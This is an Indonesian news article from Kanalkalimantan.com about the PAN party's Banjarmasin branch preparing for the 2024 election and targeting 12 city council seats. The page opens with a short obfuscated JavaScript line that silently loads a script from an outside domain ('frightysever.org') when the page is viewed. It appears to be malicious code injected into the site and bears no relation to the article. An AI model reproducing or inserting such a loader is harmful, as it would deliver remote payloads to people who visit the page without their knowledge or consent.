(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PEMILU 2024

Ambisi PAN Banjarmasin Kembali Raih Kursi Terbanyak DPRD


KANALKALIMANTAN.COM, BANJARMASIN – Dewan Pimpinan Daerah (DPD) Partai Amanat Nasional (PAN) Kota Banjarmasin melaksanakan konsolidasi partai dalam menyongsong Pemilu 2024, Sabtu (26/8/2023) siang.

Puluhan kader dan Bacaleg PAN Banjarmasin hadir dalam kegiatan yang dirangkai dengan pendidikan politik dengan tema ‘Sistem proporsional terbuka di Pemilu 2024’.

Ketua DPD PAN Banjarmasin Hary Wijaya mengatakan, kegiatan pendidikan politik yang mereka laksanakan bertujuan untuk menambah pengetahuan kepemiluan kepada kader maupun Bacaleg dari PAN Banjarmasin.

Baca juga: Datang ke Banjarmasin, Hary Tanoe Target Dua Kursi DPR RI dari Kalsel

Narasumber yang mereka hadirkan yaitu langsung dari Komisi Pemilihan Umum (KPU) dan Badan Pengawas Pemilu (Bawaslu) Kota Banjarmasin, sehingga Bacaleg PAN dapat lebih memahami aturan main Pemilu 2024.

“Kita hadirkan narasumber dari KPU dan Bawaslu Banjarmasin, untuk memberikan seperti apa arahan kontestasi Pemilu 2024, agar tidak menyalahi aturan dalam menjalani tahapan Pemilu,” kata Hary.

Kegiatan itu juga dirangkai dengan peringatan Ulang Tahun ke-25 Partai Amanat Nasional.

Baca juga: ‘Polusi’ Pemandangan Baliho Bacaleg, Bawaslu Banjarmasin Tak Bisa Tertibkan

Hary Wijaya yang saat ini memimpin DPD PAN Kota Banjarmasin menceritakan sejarah perkembangan PAN di banjarmasin sejak ikut Pemilu pertama pada tahu 1999 sampai Pemilu terakhir di bawah kepemimpinannya.
Pada kontestasi Pemilu 2024 Harry Wijaya berharap PAN kembali menjadi partai pemenang di Kota Seribu Sungai.

Tidak tanggung-tanggung, ia mengatakan menargetkan 12 kursi Anggota DPRD Kota Banjarmasin untuk periode 2024-2028 mendatang.

Baca juga: Modal Empat Laga Tak Kalah Ladeni Bali United

“PAN dengan nomor urut 12 itu target kami bisa mendapatkan kursi sesuai dengan nomor urut tersebut,” kata Hary Wijaya yang saat ini menjabat Ketua DPRD Kota Banjarmasin.

Sementara itu, diketahui PAN Banjarmasin pada Pemilu 2024 memasang 45 Bacaleg untuk merebut kursi yang terbagi di lima Dapil Kota Banjarmasin.

Pada Pemilu 2019 lalu, PAN berhasil mengungguli parpol lain dengan meraih 9 kursi DPRD Banjarmasin hingga dapat kursi Ketua DPRD. Wajar jika Hary Wijaya optimis dapat kembali menjadi partai pemenang di Pemilu 2024. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Muhammad Andi

Recent Posts

Peternak Babi di Pandarapan Keberatan Batas Waktu Tiga Bulan Bongkar Kandang

KANALKALIMANTAN.COM, BANJARBARU - Puluhan peternak babi di Jalan Pandarapan RT 34 RW 5, Kelurahan Guntung… Read More

4 menit ago

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

13 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

14 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

14 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

14 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

14 jam ago

This website uses cookies.